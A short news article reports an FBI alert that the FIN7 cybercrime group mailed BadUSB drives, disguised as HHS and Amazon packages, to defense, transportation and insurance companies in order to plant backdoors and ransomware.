Organizations in the transportation, defense and insurance industries should be on the lookout for suspicious USB drives that arrive in the mail, as they may contain malicious payloads and ransomware.
According to a new FBI alert obtained by CNN, The Record, Bleeping Computer and other publications, the ransomware group FIN7—the same group behind the BlackMatter and REvil ransomware strains—are also behind this attack.
In the advisory, the FBI says companies in those sectors received a series of fake letters via the Postal Service and UPS from August to November, with the senders impersonating the Department of Health and Human Services and Amazon.
However, those packages contained a USB stick laced with malicious software that if inserted into an endpoint, could give the threat actors access to the networks or the ability to deploy ransomware, according to reports.
CNN reports that the FBI blamed FIN7, which it calls an “Eastern European cybercrime operation” that U.S. officials have blamed for billions of dollars in losses to businesses and consumers around the world.
“The Justice Department has accused FIN7 of stealing millions of credit card numbers from restaurant and hospitality chains in 47 states, and FBI agents have pursued FIN7 operatives for years,” CNN reported.
According to The Record, when inserted, the USB drives execute a BadUSB attack in which the drive would register itself as a keyboard. Then, the device send a series of preconfigured automated keystrokes to the PC and runs PowerShell commands that download malware that serve as a backdoor for access into the victim’s network.
The publication cites the FBI, which said it has observed hackers obtain administrative access and move laterally to other local systems.
“[The] FIN7 actors then used a variety of tools—including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, TIRION—and deployed ransomware, including BlackMatter and REvil, on the compromised network,” the agency added, according to The Record.
In one case, the hackers sent a U.S. defense industry company a fake Amazon package that contains a thank you letter, a fake gift card and the USB drive.